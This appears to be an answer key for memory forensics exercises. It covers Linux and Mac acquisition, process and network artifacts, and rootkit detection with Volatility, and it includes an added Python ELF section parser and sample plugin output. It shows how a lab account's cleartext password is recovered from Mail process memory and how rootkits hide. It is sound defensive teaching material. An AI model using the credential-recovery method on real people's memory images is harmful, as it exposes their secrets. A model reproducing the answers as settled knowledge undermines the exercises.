2. Which command-line option helps create timelines in a format that's compatible with disk forensics tools and other common utilities?
A) --output=timeline
B) --output=csv
C) --output=body
D) --output=bodyfile
The correct answer is: C
3. Create a timeline from sample001.bin.
A) Run timeliner
B) Run shellbags
C) Run mftparser
D) Extract the registry hive files and process them with python-registry
E) Combine the output into one large timeline
F) Sort the timeline with mactime
The correct answer is: N/A
4. Analyze the timeline you created in Question 3 for signs of infection. What was the initial infection vector and when did it occur? What events followed?
See the answer to the next question.
5. Create a timeline for sample005.bin. Can you find any relation with sample001.bin?
Both sample001.bin and sample005.bin are memory images produced by Jack Crook for his forensic challenge.
The sample001.bin is the "ENG" machine and sample005.bin is "IIS". Now read through Chapter 18's analysis of the involved systems and see if it confirms your own suspicions.
---------------------------------------------------------------
Chapter 19: Linux Memory Acquisition
---------------------------------------------------------------
1. Why is /dev/mem no longer usable for memory acquisition?
A) It is disabled on modern distributions
B) It only supports acquisition of 1MB of memory
C) It only supports acquisition of 2GB of memory
D) It is not readable by userland programs
The correct answer is: B (with CONFIG_STRICT_DEVMEM, which modern distributions enable, reads of /dev/mem are limited to the first 1MB of physical memory)
2. Why is /dev/kmem no longer usable for memory acquisition?
A) It is disabled on modern distributions
B) It only supports acquisition of 1MB of memory
C) It only supports acquisition of 2GB of memory
D) It is not readable by userland programs
The correct answer is: A (CONFIG_DEVKMEM is off in modern distribution kernels, so the device does not exist)
3. What is one advantage that LiME has over fmem?
A) It runs from userland
B) It can be compiled once and work on any supported system
C) It is open source
D) It automates the acquisition process
The correct answer is: D (fmem only creates a /dev/fmem device that you still have to read with dd; LiME writes the capture itself, to a file or over TCP)
4. On which of the following system(s) would /proc/kcore be usable?
A) 32-bit Redhat running kernel version 2.6.32
B) 64-bit Ubuntu running kernel version 2.6.24
C) 32-bit Mandriva running kernel version 2.6.21
D) 64-bit SuSe running kernel version 3.12
The correct answer is: B, D
5. In order to create a Volatility Linux profile you must compile the profile on a system running the same kernel version and OS as you want to analyze. True/False?
The correct answer is: False (you can cross-compile, as long as the module.dwarf is built against the target kernel's headers and paired with the target's System.map)
6. Perform the following steps:
A) Install the latest version of Ubuntu within a virtual machine or on real hardware
B) Compile LiME for the system and create a Volatility profile.
(This will require installing the compiler tools and the kernel headers.)
C) Use LiME to acquire memory and then analyze it with the linux_pslist plugin using the profile you created
The correct answer is: N/A
---------------------------------------------------------------
Chapter 20: Linux Operating System
---------------------------------------------------------------
1. Which of the following dictates how the contents of an ELF file are loaded into memory at runtime?
A) The ELF header
B) The section headers
C) The program headers
D) The section symbol table
The correct answer is: C (the loader maps the segments described by the program headers; section headers serve linkers and debuggers and can be stripped entirely)
2. How does Volatility's Linux support find the initial DTB?
A) Scanning physical memory looking for an allocation signature
B) Utilizing Linux's identity mapping of kernel code and data
C) Finding the init process and then finding its page table value
D) Walking the list of kernel modules until the kernel is found and then finding its page table value
The correct answer is: B
3. The proc file system is correctly acquired when performing disk imaging, such as through the dd command. True/False?
The correct answer is: False (/proc is a memory-only file system)
4. The /proc/1/ directory corresponds to which type of object?
A) Process
B) Network Connection
C) Opened File Handles
D) Kernel Module
The correct answer is: A (the init process, PID 1)
5. Analyze /bin/ls from the Ubuntu installation that you created in the previous chapter. Using readelf -WS and nm, answer the following questions:
A) How many sections does the binary have?
B) How many symbols does the binary contain?
C) What is the virtual address of the .text section?
The correct answer can be determined by using nm (or readelf -Ws) to read the file's symbols and readelf -WS to read the sections. (A distribution /bin/ls is usually stripped, so nm reports no symbols and readelf -Ws lists only the dynamic symbols from .dynsym.)
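What readelf -WS reads is the section header table: e_shoff, e_shentsize and e_shnum in the ELF header locate it, and each entry's sh_name is an offset into the string table that e_shstrndx points at. The following is an added example (not the book's code) that parses that table for an ELF64 file and answers A and C programmatically. It runs against SAMPLE_ELF, a minimal ELF64 image constructed inside the file (one .text section holding `xor eax,eax; ret` at the hypothetical address 0x4010c0, plus .shstrtab); pass a path on the command line to run it on a real binary such as /bin/ls.

```python
"""Parse the ELF64 section header table the way `readelf -WS` does: count the
sections, resolve their names via .shstrtab, and report where each is loaded.

Added example, not the book's code. SAMPLE_ELF is a constructed minimal ELF64
image (hypothetical .text address 0x4010c0). Section headers are informational:
the loader uses the program headers, so a stripped or tampered binary may have
none, or misleading ones.
"""
import struct
import sys
from collections import namedtuple
from typing import List, Optional

Section = namedtuple("Section", "index name type flags addr offset size link info align entsize")

EHDR_FMT = "16sHHIQQQIHHHHHH"   # Elf64_Ehdr, 64 bytes
SHDR_FMT = "IIQQQQIIQQ"          # Elf64_Shdr, 64 bytes
SHT_NAMES = {0: "NULL", 1: "PROGBITS", 2: "SYMTAB", 3: "STRTAB", 4: "RELA", 5: "HASH",
             6: "DYNAMIC", 7: "NOTE", 8: "NOBITS", 11: "DYNSYM"}
SHF_BITS = ((0x1, "W"), (0x2, "A"), (0x4, "X"))   # readelf's Flg column letters


def flags_str(flags: int) -> str:
    return "".join(letter for bit, letter in SHF_BITS if flags & bit)


def parse_sections(data: bytes) -> List[Section]:
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2:
        raise ValueError("only ELFCLASS64 is handled here")
    end = "<" if data[5] == 1 else ">"              # EI_DATA: 1 = little-endian
    (_, _, _, _, _, _, shoff, _, _, _, _,
     shentsize, shnum, shstrndx) = struct.unpack_from(end + EHDR_FMT, data, 0)
    if shoff == 0 or shnum == 0:
        return []                                    # section headers stripped
    if shentsize != struct.calcsize("<" + SHDR_FMT):
        raise ValueError(f"unexpected e_shentsize {shentsize}")
    raw = [struct.unpack_from(end + SHDR_FMT, data, shoff + i * shentsize) for i in range(shnum)]
    # Field order in raw[i]: name type flags addr offset size link info align entsize.
    strtab_off, strtab_size = raw[shstrndx][4], raw[shstrndx][5]
    strtab = data[strtab_off:strtab_off + strtab_size]

    def name_at(idx: int) -> str:
        nul = strtab.find(b"\x00", idx)
        return strtab[idx:nul if nul != -1 else None].decode("ascii", "replace")

    return [Section(i, name_at(s[0]), *s[1:]) for i, s in enumerate(raw)]


def section_by_name(sections: List[Section], name: str) -> Optional[Section]:
    return next((s for s in sections if s.name == name), None)


def readelf_like(sections: List[Section]) -> List[str]:
    lines = [f"There are {len(sections)} section headers:",
             f"  [Nr] {'Name':<18} {'Type':<10} {'Address':<16} {'Off':<6} {'Size':<6} Flg"]
    for s in sections:
        lines.append(f"  [{s.index:2d}] {s.name:<18} {SHT_NAMES.get(s.type, hex(s.type)):<10} "
                     f"{s.addr:016x} {s.offset:06x} {s.size:06x} {flags_str(s.flags)}")
    return lines


def build_sample_elf() -> bytes:
    """Constructed ELF64 image: header, .shstrtab, .text, then three section headers."""
    shstrtab = b"\x00.text\x00.shstrtab\x00"       # names at offsets 1 and 7
    text = b"\x48\x31\xc0\xc3"                       # xor eax,eax ; ret
    shstrtab_off, text_off, shoff = 64, 96, 112
    ehdr = struct.pack("<" + EHDR_FMT, b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8,
                       2, 0x3E, 1, 0x4010C0, 0, shoff, 0, 64, 56, 0, 64, 3, 2)
    shdrs = b"".join(struct.pack("<" + SHDR_FMT, *s) for s in [
        (0, 0, 0, 0, 0, 0, 0, 0, 0, 0),                            # [0] NULL
        (1, 1, 0x6, 0x4010C0, text_off, len(text), 0, 0, 16, 0),  # [1] .text, PROGBITS, AX
        (7, 3, 0x0, 0, shstrtab_off, len(shstrtab), 0, 0, 1, 0),   # [2] .shstrtab, STRTAB
    ])
    img = bytearray(shoff + len(shdrs))
    img[0:64] = ehdr
    img[shstrtab_off:shstrtab_off + len(shstrtab)] = shstrtab
    img[text_off:text_off + len(text)] = text
    img[shoff:] = shdrs
    return bytes(img)


SAMPLE_ELF = build_sample_elf()

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_ELF
    print("\n".join(readelf_like(parse_sections(blob))))
```

The same header fields are what linux_moddump and the ELF-aware parts of Volatility rely on, which is why a module that zeroes e_shoff in its in-memory image still runs fine but yields a dump with no section table.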
In the following readelf output from an Ubuntu /bin/ls you can see each section and where it is loaded:
$ readelf -WS /bin/ls
There are 28 section headers, starting at offset 0x1b670:

Section Headers:
  [Nr] Name               Type     Address          Off    Size   ES Flg Lk Inf Al
  [ 0]                    NULL     0000000000000000 000000 000000 00      0   0  0
  [ 1] .interp            PROGBITS 0000000000400238 000238 00001c 00   A  0   0  1
  [ 2] .note.ABI-tag      NOTE     0000000000400254 000254 000020 00   A  0   0  4
  [ 3] .note.gnu.build-id NOTE     0000000000400274 000274 000024 00   A  0   0  4
  [ 4] .hash              HASH     0000000000400298 000298 000370 04   A  6   0  8
  [ 5] .gnu.hash          GNU_HASH 0000000000400608 000608 000060 00   A  6   0  8
  [ 6] .dynsym            DYNSYM   0000000000400668 000668 000b58 18   A  7   1  8
  [ 7] .dynstr            STRTAB   00000000004011c0 0011c0 000568 00   A  0   0  1
  [ 8] .gnu.version       VERSYM   0000000000401728 001728 0000f2 02   A  6   0  2
  [ 9] .gnu.version_r     VERNEED  0000000000401820 001820 0000a0 00   A  7   3  8
  [10] .rela.dyn          RELA     00000000004018c0 0018c0 000078 18   A  6   0  8
  [11] .rela.plt          RELA     0000000000401938 001938 0009d8 18   A  6  13  8
  [12] .init              PROGBITS 0000000000402310 002310 00000e 00  AX  0   0  4
  [13] .plt               PROGBITS 0000000000402320 002320 0006a0 10  AX  0   0 16
  [14] .text              PROGBITS 00000000004029c0 0029c0 01022c 00  AX  0   0 16
  [15] .fini              PROGBITS 0000000000412bec 012bec 000009 00  AX  0   0  4
[snip]
For this binary the answer to A is 28 sections and to C is 0x00000000004029c0 (the Address column of .text).
---------------------------------------------------------------
Chapter 21: Processes and Process Memory
---------------------------------------------------------------
1. The linux_pstree plugin is helpful in which situation?
A) Finding hidden processes
B) Determining when processes exited
C) Mapping processes to network connections
D) Determining the child/parent relationship between processes
The correct answer is: D
2. The name of the process reported by linux_pslist is susceptible to userland manipulation. True/False?
The correct answer is: False (the name is stored in kernel memory)
3. The name of the process reported by linux_psaux is susceptible to userland manipulation. True/False?
The correct answer is: True (this value comes from the process's own address space, which the process can rewrite)
4. What does the PATH environment variable specify?
A) The list of directories writable by the user
B) The list of directories to search for applications
C) The list of directories to search for shared libraries
D) The list of directories storing user configuration files
The correct answer is: B
5. When using default settings, which of these appear in bash's data structures in memory, but not on disk?
A) The order in which commands were executed
B) The time when commands were executed
C) The user who executed commands
D) The directory commands were executed from
The correct answer is: B (bash stamps each in-memory history entry with the time it ran; the timestamps only reach .bash_history if HISTTIMEFORMAT is set)
6. For the remaining questions of this chapter, analyze linux-sample-1.bin using the provided profile.
A) What is the ID of the user that read the passwd and shadow file?
B) Did this user log in locally or over SSH?
C) Which parameters were passed to the command when first elevating privileges (hint: check the environment of the relevant process)?
D) What is the user ID of the user logged into the desktop locally?
E) Which network services are running on the system?
Answers: If you run the linux_bash plugin you see that the shell that read the files is PID 8503:
$ python vol.py -f linux-sample-1.bin --profile=Linuxbookx64 linux_bash
Volatility Foundation Volatility Framework 2.4
Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
    8503 bash                 2014-06-24 13:00:12 UTC+0000   cat /etc/passwd
    8503 bash                 2014-06-24 13:00:17 UTC+0000   cat /etc/group
If you look up that process with linux_pslist you can see that the user ID (UID) is 1001:
$ python vol.py -f linux-sample-1.bin --profile=Linuxbookx64 linux_pslist -p 8503
Volatility Foundation Volatility Framework 2.4 (Beta)
Offset             Name  Pid  Uid  Gid  DTB       Start Time
------------------ ----- ---- ---- ---- --------- ----------
0xffff88001ac9c740 bash  8503 1001 1001 0x1ee6000 2014-06-24 12:58:55 UTC+0000
linux_pstree shows that sshd is the parent of the bash process with PID 8503, so the user logged in over SSH:
$ python vol.py -f linux-sample-1.bin --profile=Linuxbookx64 linux_pstree
.sshd                3373            0
..sshd               8497            0
...sshd              8502            1001
....bash             8503            1001
linux_bash also shows the use of su a few seconds before the shadow file is read (linux_psenv on the resulting process shows the environment the hint refers to):
$ python vol.py -f linux-sample-1.bin --profile=Linuxbookx64 linux_bash
    8503 bash                 2014-06-24 13:00:02 UTC+0000   su
The user ID of the local user is 1000, as shown by linux_pslist. Apache2, smbd, exim, and dovecot are all actively listening on the network.
---------------------------------------------------------------
Chapter 22: Networking Artifacts
---------------------------------------------------------------
1. Activity related to UNIX sockets would appear in a program such as Wireshark running on the local machine. True/False
The correct answer is: False (Wireshark captures from network interfaces; UNIX sockets never touch one)
2. Raw sockets are used only for malicious purposes. True/False
The correct answer is: False
3. Why is the ARP cache useful for forensics?
A) It contains remote IP addresses of attackers
B) It contains remote IP addresses used for data exfiltration
C) It contains information about local IP addresses contacted during lateral movement
D) It contains information about local IP addresses assigned to printers
The correct answer is: C
4. Which networking artifact was removed from subsequent versions of the Linux kernel?
A) Packet queues
B) Aliased interfaces
C) ARP cache
D) Routing cache
The correct answer is: D (the IPv4 routing cache was removed in kernel 3.6)
5. For the remaining questions of this chapter, analyze linux-sample-2.bin using the provided profile.
A) Which web browser was used by the user of the system?
B) What was the PID of the main browser in use?
C) Which IP addresses were contacted using HTTPS?
D) What type of browsing activity does the route cache show?
E) Which processes are listening for connections?
F) How many network interfaces are active on the system?
G) Are any of the interfaces in promiscuous mode?
Answers: linux_pslist shows that the iceweasel browser is running as PID 8700.
To determine the IP addresses contacted, filter linux_netstat with the -p option for PID 8700 and grep for port 443:
$ python vol.py -f linux-sample-2.bin --profile=Linuxbookx64 linux_netstat -p 8700 | grep 443
Volatility Foundation Volatility Framework 2.4 (Beta)
TCP      192.168.201.161:51499 74.125.228.36:443     ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:58610 206.190.56.190:443    ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:58615 206.190.56.190:443    ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:38091 74.125.228.59:443     ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:33011 93.184.216.146:443    ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:41442 91.190.218.18:443     ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:47616 173.252.112.23:443    ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:57400 74.125.228.60:443     ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:41488 23.59.244.47:443      ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:38180 168.143.241.160:443   ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:38181 168.143.241.160:443   ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:39245 74.125.29.95:443      ESTABLISHED  iceweasel/8700
TCP      192.168.201.161:33851 74.125.228.42:443     ESTABLISHED  iceweasel/8700
(grep 443 also matches any address or local port that happens to contain 443, so confirm that the match is the remote port before counting it.)
The linux_route_cache plugin with the -R option shows connections to several websites. To determine listening processes, use linux_netstat and grep for LISTEN. linux_ifconfig shows two active interfaces and that neither is in promiscuous mode:
$ python vol.py -f linux-sample-2.bin --profile=Linuxbookx64 linux_ifconfig
Volatility Foundation Volatility Framework 2.4
Interface        IP Address           MAC Address        Promiscuous Mode
---------------- -------------------- ------------------ ----------------
lo               127.0.0.1            00:00:00:00:00:00  False
eth0             192.168.201.161      00:0c:29:8f:ed:ca  False
---------------------------------------------------------------
Chapter 23: Kernel Memory Artifacts
---------------------------------------------------------------
1. What type of information would NOT be found in the kernel debug buffer?
A) User logins
B) Removable device usage
C) Wireless network activity
D) Listings of attached hardware devices
The correct answer is: A
2. The linux_lsmod plugin finds kernel modules through scanning physical memory. True/False?
The correct answer is: False (it walks the linked list, so a module unlinked from it is missed; that is what linux_check_modules is for)
3. The Linux kernel uses a 2GB / 2GB split of virtual memory on 32-bit systems. True/False
The correct answer is: False (it uses 3GB / 1GB by default)
4. What is NOT true of kernel modules extracted with linux_moddump?
A) They can be scanned with AV and Yara signatures
B) They can be reverse engineered
C) They can be reloaded on the live system
D) They will not match the hash of the original LKM from disk
The correct answer is: C
5. module_addr_min and module_addr_max specify the beginning and ending address of which data in kernel memory?
A) The kernel executable
B) The last kernel module to load
C) The memory range occupied by all kernel modules
D) The last kernel module to unload
The correct answer is: C
6. For the remaining questions of this chapter, analyze linux-sample-3.bin using the provided profile.
A) At what address is the lime kernel module loaded? Use this address to dump the kernel module from memory
B) How many sections does the module have?
C) Where is the .text section loaded in memory?
D) Which parameter(s) were passed to LiME to dump memory?
E) Which physical addresses does RAM occupy?
F) Did LiME acquire only these regions or others as well?
linux_lsmod and linux_moddump can be used to acquire the module from memory:
$ python vol.py -f linux-sample-3.bin --profile=Linuxbookx64 linux_lsmod | grep lime
Volatility Foundation Volatility Framework 2.4
ffffffffa03b2010 lime 17991
$ python vol.py -f linux-sample-3.bin --profile=Linuxbookx64 linux_moddump -b 0xffffffffa03b2010 -D .
Volatility Foundation Volatility Framework 2.4
Wrote 2053656 bytes to lime.0xffffffffa03b2010.lkm
You can find the address of the .text section using readelf on the extracted module or with the -T parameter to linux_lsmod. The -P flag to linux_lsmod recovers the parameters the module was loaded with (for LiME, the path= and format= values). The linux_iomem plugin lists the regions of physical memory. You can verify that LiME only acquired RAM regions by comparing the "System RAM" ranges in linux_iomem with the ranges recorded in the LiME segment headers, which the limeinfo plugin prints.
---------------------------------------------------------------
Chapter 24: File Systems in Memory
---------------------------------------------------------------
1. What effect does the noatime mount option have on forensics?
A) Access times of directories are not updated
B) Access times of files are not updated
C) Access times of files and directories are not updated
D) Access times of files are updated only when accessed by the owner
The correct answer is: C
2. When replicating file systems from memory, which MAC time is not replicated?
A) Modified
B) Accessed
C) Created
The correct answer is: C
3. Which of the following file systems is not stored on disk?
A) tmpfs
B) ext3
C) xfs
D) jfs
The correct answer is: A
4. Which of the following directories is often used by attackers to store data that does not need to persist across reboots?
A) /usr/tmp
B) /dev/mm
C) /tmp
D) /var/runlib
The correct answer is: C
5. If one page of a file is accessed by an application, then the entire file is read into the file cache. True/False?
The correct answer is: False (only the required portion and potentially a small read-ahead chunk)
6. For the remaining questions of this chapter, analyze linux-sample-3.bin using the provided profile.
A) Recover the cookies.sqlite file of the vol user. Which websites stored cookies on this user's system?
B) How many entries are in /etc/hosts?
C) What type of file is /home/vol/.cache/mozilla/firefox/sren9std.default/Cache/8/10/4B0E7d01?
Answers: These files can all be recovered with linux_find_file or linux_recover_filesystem. An sqlite viewer can open the cookie database, a text editor can view the hosts file, and the file command reveals that the cache file is a picture. (Remember question 5: only the cached portion of each file comes back, so a large file may be incomplete.)
---------------------------------------------------------------
Chapter 25: Userland Rootkits
---------------------------------------------------------------
1. Which of the following operations is not directly supported by ptrace?
A) Attaching to a running process
B) Reading from a remote process' memory
C) Creating a thread in a remote process
D) Setting the general purpose registers of a remote process
The correct answer is: C
2. How are LD_PRELOAD-based rootkits detected?
A) By checking for inline hooks
B) By hashing files on disk and comparing the hash to the in-memory version
C) By checking for GOT overwrites
D) By comparing string comparison operations
The correct answer is: C (the GOT entries of the hooked functions resolve into the preloaded library instead of the library that should export them, which is what linux_plthook checks)
3. GOT overwrites are equivalent to which type of hook on Windows?
A) SSDT hooks
B) IAT/EAT hooks
C) Callback hooks
D) IDT hooks
The correct answer is: B
4. For stability reasons, which set of instructions is generally overwritten by inline hooks?
A) The first few instructions of a function
B) The last few instructions of a function
C) The instructions after the first CALL instruction
D) The instructions after the first CMP instruction
The correct answer is: A
5. Detection of which type of hook requires the original application binary or shared library?
A) Inline hook
B) GOT overwrite
C) Process hollowing
D) Function pointer overwrite
The correct answer is: C
6. For the following questions analyze linux-sample-4.bin using the provided profile.
A) Which processes are victims of an LD_PRELOAD attack?
B) Which user is running the infected processes?
C) What is the full path to the injected library?
D) How does the library get injected into each process of the user?
E) Which function(s) is the malicious library hooking?
F) What is the path of the logfile in which the library stores the stolen data on disk?
Answer: linux_plthook can find processes infected via LD_PRELOAD. In particular, it finds that the pico process (/bin/nano) has its fwrite function hooked by the library /home/mark/.bashinit. Both the library's location and its name are suspicious: a dotfile in a home directory is not where a legitimate shared object lives. The library gets loaded into each process of the mark user through a hijacked .bashrc (presumably setting LD_PRELOAD for every shell that user starts). The path to the logfile can be found by running linux_lsof on the infected process.
7. For the following questions analyze linux-sample-5.bin using the provided profile.
A) Which process is inline hooked?
B) Which function is inline hooked?
C) What is the purpose of the inline hook?
D) What is the name of the library performing the hook?
Answer: linux_apihooks shows two results for the bash process with PID 3619:
$ python vol.py -f linux-sample-5.bin --profile=Linuxbookx64 linux_apihooks
Volatility Foundation Volatility Framework 2.4
Pid     Name             Hook VMA                                 Hook Symbol              Hooked Address     Type  Hook Address       Hook Library
------- ---------------- ---------------------------------------- ------------------------ ------------------ ----- ------------------ ------------
   3619 bash             /lib/x86_64-linux-gnu/libc-2.13.so       time                     0x00007f4429b45950 CALL  0x0000000000000000
   3619 bash             /lib/x86_64-linux-gnu/libc-2.13.so       open                     0x00007f4429b77f00 JMP   0x00007f44290708b0 /run/shm/b
The first result, for time, is a false positive (a CALL whose target is reported as 0x0 and belongs to no library), but the second shows that open is being redirected by a JMP to a library named b that lives in /run/shm. A shared object in a tmpfs directory, with a one-letter name, that hooks open in a shell is very suspicious.
---------------------------------------------------------------
Chapter 26: Kernel Mode Rootkits
---------------------------------------------------------------
1. Legitimate system call handlers can be implemented in kernel modules. True/False?
The correct answer is: False
2. Which of the following members of tcp4_seq_info is commonly hooked in order to hide a rootkit's network connections?
A) start
B) stop
C) next
D) show
The correct answer is: D
3. The NF_REPEAT Netfilter option is often used by rootkits to hide network connections from other kernel components and userland packet sniffers. True/False?
The correct answer is: False (they often use NF_STOLEN)
4. How does Average Coder hide logged-in users from the system?
A) Hooking the write operation of /proc/buddyinfo
B) Hooking the read operation of /var/run/utmp
C) Hooking the read directory operation of /var/run
D) Hooking the open operation of /usr/bin/who
The correct answer is: B
5. Which userland-accessible source on a live system can find kernel modules hidden from the global list of modules?
A) The IO_GET_MODULES I/O control request
B) The /sys/module directory
C) The /proc/modules file
D) The get_modules system call
The correct answer is: B (a module unlinked from the modules list usually still has its kobject directory under /sys/module, one of the cross-views linux_check_modules uses)
6. For the following questions analyze linux-sample-6.bin using the provided profile.
A) Where is the malicious kernel module loaded?
B) Which system calls are hooked?
C) Which capabilities can the hooks give to the rootkit?
D) What type of hooks are placed in the file system?
E) Are there hooks in the network stack?
Answers: The hidden module can be found with linux_check_modules:

$ python vol.py -f linux-sample-6.bin --profile=Linuxbookx64 linux_check_modules
Volatility Foundation Volatility Framework 2.4
Module Address     Module Name
------------------ ------------------------
0xffffffffa04280a0 ipsecs_kbeast_v1

linux_check_syscall can be used to find the hooked indexes:

$ python vol.py -f /mnt/hgfs/Desktop/linux-sample-6.bin --profile=Linuxbookx64 linux_check_syscall
Volatility Foundation Volatility Framework 2.4
Table Name Index System Call              Handler Address    Symbol
---------- ----- ------------------------ ------------------ ------------------------------------------------------------
64bit      0                              0xffffffffa04259b6 HOOKED: ipsecs_kbeast_v1/h4x_read
64bit      1                              0xffffffffa04250e7 HOOKED: ipsecs_kbeast_v1/h4x_write
64bit      2                              0xffffffffa042548f HOOKED: ipsecs_kbeast_v1/h4x_open

On x86-64, indexes 0, 1 and 2 are read, write and open, so the rootkit sees every file and descriptor access on the system. linux_check_fop and linux_check_afinfo can be used to determine the file system and network stack hooks:

$ python vol.py -f linux-sample-6.bin --profile=Linuxbookx64 linux_check_afinfo
Volatility Foundation Volatility Framework 2.4
Symbol Name                                Member                         Address
------------------------------------------ ------------------------------ ------------------
tcp4_seq_afinfo                            show                           0xffffffffa04255db

The hooked show handler lies in the same address range as the module's h4x_* system call handlers, so the network stack hook belongs to the same rootkit.
---------------------------------------------------------------
Chapter 27: Case Study: Phalanx 2
---------------------------------------------------------------
1. How does P2 hide processes?
A) IOCTL handler hooks
B) System call hooks
C) Direct Kernel Object Manipulation (DKOM)
D) Inline hooks in the libc mapped into each process
The correct answer is: B
2. What was unusual about P2's network connections?
A) P2 connected multiple times to a hardcoded remote IP address
B) P2 connected to itself over the network
C) P2 performed DNS resolution using GoDaddy's DNS servers
D) The connections occurred only over IPv6
The correct answer is: B
3. P2 performs the majority of its work through a loadable kernel module. True/False?
The correct answer is: False (most of the work occurs in user mode through /dev/mem)
4. Which directory does P2 use to mark its presence on a system?
A) /tmp
B) /var/run
C) /dev/shm
D) /etc
The correct answer is: C
5. P2 re-executes itself upon startup so that it will not appear in the process list. True/False?
The correct answer is: False (it re-executes to break free from ptrace)
----------------------------------------------------------------------
Chapter 28: Mac Acquisition and Internals
----------------------------------------------------------------------
1. On Mac systems, processes run in the Mach layer and the kernel runs in the BSD layer. True/False?
The correct answer is: False (the kernel does not run in the BSD layer)
2. Why does Volatility need to account for the Mac kernel's address space layout randomization?
A) Userland libraries will be mapped at different offsets than reported by the virtual memory subsystem structures
B) Addresses in the profile will not correspond to where the data structures are mapped in the memory capture
C) Scanning for data structures requires smarter algorithms when ASLR is in use
D) Volatility does not need to account for it
The correct answer is: B
3. Physical memory acquisition on Mac systems can be accomplished using built-in operating system facilities. True/False?
The correct answer is: False (there is no supported built-in API for acquisition)
4. Mac Memory Reader supports capture to the ELF format. True/False?
The correct answer is: False (it supports padded, non-padded, and Mach-O)
5. Which of the following is required to build a Mac Volatility profile?
A) The kernel header files
B) C/C++ compiler tools
C) MacPorts
D) The kernel debug kit
The correct answer is: D
6. If you have access to an OS X system, then build a Volatility profile for Mac 10.9.3.
----------------------------------------------------------------------
Chapter 29: Mac Memory Overview
----------------------------------------------------------------------
1. What is the name of the process that spawns the initial launchd process?
A) kernel_task
B) swapper
C) init
D) SYSTEM
The correct answer is: A
2. When the dyld cache is in use, mac_proc_maps will properly list all shared libraries. True/False?
The correct answer is: False (you must use mac_dyld_maps)
3. Mac tracks kernel modules only through a global list of modules. True/False?
The correct answer is: False
4. Which command lists active network connections along with their owning process on a live Mac system?
A) netstat -an
B) netstat -pan
C) lsof -i
D) lsof -p
The correct answer is: C
5. To answer the following questions, analyze mac-sample-1.bin with the provided 10.9.3 profile.
A) Which user ID is the vim process run by?
B) Is the user logged in locally or remotely?
C) What is the path to the file being edited in vim?
D) What is the full path to vim on the local system?
E) What is the load address of libmacho.dylib inside the running vim process?
F) What text was being typed in vim at the time of acquisition?
G) Which websites were being accessed around the time of acquisition?
Answer: mac_pslist shows that vim is running as user ID 501. mac_pstree shows that vim was spawned by Terminal on the local system. mac_proc_maps can be used to find the full path to vim:

$ python vol.py -f mac-sample-1.bin --profile=MacMavericks_10_9_3_AMDx64 mac_proc_maps -p 757
Volatility Foundation Volatility Framework 2.4 (Beta)
757 vim 0x108042000 0x108188000 r-x Macintosh HD/usr/bin/vim

mac_dyld_maps can be used to list the library's load address. The text being typed into vim can be recovered through analysis of the vim heap and also from the .swp file that vim creates for the file being edited. mac_route can be used to determine which IP addresses the system was connected to.
----------------------------------------------------------------------
Chapter 30: Malicious Code and Rootkits
----------------------------------------------------------------------
1. DYLD_INSERT_LIBRARIES is similar to which concept of Linux?
A) ptrace
B) MAP_LIBRARY_ON_START
C) LD_PRELOAD
D) Inline hooking
The correct answer is: C
2. sysctl provides an interface for userland processes to request actions from the kernel. True/False?
The correct answer is: True
3. Which of the following is not a standard TrustedBSD policy module?
A) TMSafetyNet
B) Sandbox
C) Quarantine
D) AppleEvents
The correct answer is: D
4. Which feature of Mac is similar to Windows run keys?
A) Launch Agents
B) Spotlight
C) Service Indexes
D) Application Preloads
The correct answer is: A
5. The NSCreateObjectFileImageFromMemory API facilitates which of the following anti-forensics techniques?
A) Hiding a library from a process' list of libraries
B) Process hollowing
C) API hooking
D) Reconstructed library injection
The correct answer is: A
6. To answer the following questions, analyze mac-sample-2.bin with the provided 10.9.3 profile. There is a kernel rootkit installed that you must find and track.
A) What is the name of the kernel rootkit?
B) How does it hook the system?
C) What is the address of the kernel module in memory?
D) Extract the kernel module
E) What is the MD5 hash of the extracted module?
Answer: The rootkit is logKext. It can be found through mac_lsmod and mac_notifiers.
----------------------------------------------------------------------
Chapter 31: Tracking User Activity
----------------------------------------------------------------------
1. The Mac default login keychain only holds the password of the user. True/False?
The correct answer is: False (it stores a variety of other passwords and credentials)
2. Each password inside a keychain is encrypted with a different key and must be opened separately. True/False?
The correct answer is: False (they are all encrypted with the same key)
3. Which of the following plugins enables rapid development of new application-specific analysis plugins?
A) mac_pslist
B) mac_proc_maps
C) mac_yarascan
D) mac_lsof
The correct answer is: C
4. How does Volatility recover clear-text OTR messages?
A) It finds remnant session keys then attempts to decrypt all recovered encrypted messages
B) It finds the clear-text messages displayed to the user through the chat window
C) It finds the data structures that hold clear-text messages after they are sent on the wire
D) It finds encryption keys in memory then applies them to encrypted messages stored in PCAP files
The correct answer is: B
5. To answer the following questions analyze mac-sample-3.bin using the provided 10.9.3 profile. In this sample a user is logged into an email account using the Apple Mail client.
A) What is the user account configured for the Apple Mail client to use?
B) Which account did the person send an email to and receive a reply from?
C) What time was the email sent?
D) What is (was) the password to the Gmail account?
E) How many emails did the user send?
These questions can be answered using mac_yarascan and searching for Gmail and email-related activity. The email account is iaminakeychain@gmail.com. The conversation occurred with atcuno@gmail.com. Entire message contents can be found by examining the memory of PID 258 (the Mail client) with mac_memdump or mac_yarascan. The original password to the account can be found by looking for the Passwd HTTPS POST parameter:

$ python vol.py -f mac-sample-3.bin --profile=MacMavericks_10_9_3_AMDx64 mac_yarascan -p 258 -Y "&Pass"
Volatility Foundation Volatility Framework 2.4
Task: Mail pid 258 rule r1 addr 0x10a06b9ad
0x000000010a06b9ad  26 50 61 73 73 77 64 3d 62 72 65 61 6b 6d 65 64   &Passwd=breakmed
0x000000010a06b9bd  6f 77 6e 34 35 36 26 73 65 72 76 69 63 65 3d 6d   own456&service=m

